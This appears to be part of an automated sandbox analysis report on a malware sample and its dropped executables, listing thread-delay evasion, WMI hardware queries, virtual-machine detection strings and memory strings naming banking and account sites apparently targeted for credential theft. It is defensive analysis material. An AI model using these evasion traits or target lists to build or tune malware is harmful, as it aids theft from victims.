Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 824
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 2176
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 788
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 932
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe	Window / User API: threadDelayed 773
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window / User API: threadDelayed 6908
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Window / User API: threadDelayed 2433
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4800
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 890
Source: C:\Users\user\AppData\Local\Temp\1070077001\1f8e467ee9.exe	Window / User API: threadDelayed 503

Source: C:\Users\user\Desktop\random.exe

API coverage: 3.4 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -23058430092136925s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2852	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748	Thread sleep count: 247 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7748	Thread sleep time: -494247s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4932	Thread sleep count: 255 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4932	Thread sleep time: -510255s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776	Thread sleep count: 1658 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776	Thread sleep time: -3317658s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268	Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268	Thread sleep time: -5940000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep count: 692 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7876	Thread sleep time: -1384692s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4788	Thread sleep count: 702 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4788	Thread sleep time: -1404702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752	Thread sleep count: 231 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7752	Thread sleep time: -462231s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4920	Thread sleep count: 220 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4920	Thread sleep time: -440220s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8156	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776	Thread sleep count: 4485 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7776	Thread sleep time: -8974485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7424	Thread sleep count: 959 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7424	Thread sleep time: -1918959s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7444	Thread sleep count: 824 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7444	Thread sleep time: -1648824s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 227 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 168 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 157 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 179 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1612	Thread sleep count: 179 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 3184	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 2080	Thread sleep count: 2176 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 2080	Thread sleep time: -4354176s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7428	Thread sleep count: 788 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7428	Thread sleep time: -1576788s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1564	Thread sleep count: 932 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 1564	Thread sleep time: -1864932s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7404	Thread sleep count: 773 > 30
Source: C:\Users\user\AppData\Local\Temp\1070072001\b7668220f8.exe TID: 7404	Thread sleep time: -1546773s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 1868	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 3232	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 2344	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 3484	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 3344	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 3340	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 636	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 636	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe TID: 5344	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe TID: 5184	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5668	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5164	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5336	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5860	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5860	Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 2852	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 6720	Thread sleep time: -52026s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5972	Thread sleep time: -60030s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5608	Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5408	Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 2856	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5460	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 6480	Thread sleep time: -56028s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 4200	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 3616	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5172	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe TID: 5460	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3380	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1504	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4872	Thread sleep count: 890 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796	Thread sleep count: 105 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5568	Thread sleep count: 47 > 30
Source: C:\Windows\System32\svchost.exe TID: 3172	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1070074001\0a633717d1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1070075001\376bb929a5.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D3DBBE
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D0C2A2 FindFirstFileExW,	0_2_00D0C2A2
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D468EE FindFirstFileW,FindClose,	0_2_00D468EE
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00D4698F
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D3D076
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00D3D3A9
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D49642
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D4979D
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00D49B2B
Source: C:\Users\user\Desktop\random.exe	Code function: 0_2_00D45C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00D45C97

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_00CD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00CD42DE

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1070073001\6d81c0d08d.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 376bb929a5.exe, 0000001C.00000003.2627697223.0000000005735000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0a633717d1.exe, 00000017.00000003.2344691415.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2632268244.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2467295443.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2564882043.0000000000B55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWw
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 327981c77b.exe, 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware?w+
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 1f8e467ee9.exe, 0000001B.00000003.2665551914.00000000019F6000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2608458370.00000000019F6000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2680992473.00000000019F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWn
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 376bb929a5.exe, 0000001C.00000003.2582785648.0000000001091000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2583600680.0000000001097000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2900248658.0000000001097000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2882142478.0000000001091000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2929658581.0000000001091000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2932666966.0000000001097000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2879053676.0000000001090000.00000004.00000020.00020000.00000000.sdmp, 376bb929a5.exe, 0000001C.00000003.2894834447.0000000001092000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWs
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: mshta.exe, 00000008.00000003.1445027280.0000022BD4CF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 0a633717d1.exe, 00000017.00000003.2344691415.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2620798729.0000000000B19000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000002.2632268244.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2467295443.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2564882043.0000000000B55000.00000004.00000020.00020000.00000000.sdmp, 0a633717d1.exe, 00000017.00000003.2560184062.0000000000B19000.00000004.00000020.00020000.00000000.sdmp, 327981c77b.exe, 00000019.00000002.2527448311.0000000001584000.00000004.00000020.00020000.00000000.sdmp, 327981c77b.exe, 00000019.00000002.2527448311.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2729665874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000023.00000002.2763329304.0000000007120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: mshta.exe, 00000021.00000002.2585993703.000000000306A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: powershell.exe, 00000009.00000002.1554876490.00000259EF25F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: 327981c77b.exe, 00000019.00000002.2527448311.000000000153E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: mshta.exe, 00000002.00000002.1429232917.0000000002AC3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\?
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: skotes.exe, skotes.exe, 0000000D.00000002.1534657926.0000000000FC3000.00000040.00000001.01000000.0000000E.sdmp, TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, 0000000E.00000002.1551391017.0000000001053000.00000040.00000001.01000000.0000000B.sdmp, 6d81c0d08d.exe, 6d81c0d08d.exe, 00000015.00000002.2893639536.0000000000EB6000.00000040.00000001.01000000.00000012.sdmp, 0a633717d1.exe, 0a633717d1.exe, 00000017.00000002.2663262692.0000000000F76000.00000040.00000001.01000000.00000013.sdmp, 327981c77b.exe, 00000019.00000002.2508007909.0000000000E64000.00000040.00000001.01000000.00000015.sdmp, 327981c77b.exe, 0000002E.00000002.2790900810.0000000000E64000.00000040.00000001.01000000.00000015.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: powershell.exe, 00000023.00000002.2763329304.0000000007120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE, 0000000B.00000003.1475161435.00000000019CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: powershell.exe, 00000006.00000002.1470448805.0000000007BA5000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000003.2883639517.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, 6d81c0d08d.exe, 00000015.00000002.2909286069.00000000016BF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: mshta.exe, 00000021.00000002.2585993703.000000000306A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 376bb929a5.exe, 0000001C.00000003.2627697223.000000000572F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 1f8e467ee9.exe, 0000001B.00000003.2505872523.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000002.2769460852.00000000019FF000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2608401429.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2504692148.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2739875912.00000000019FC000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2503405715.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2499995917.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2680992473.00000000019FA000.00000004.00000020.00020000.00000000.sdmp, 1f8e467ee9.exe, 0000001B.00000003.2665504922.00000000019FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%S
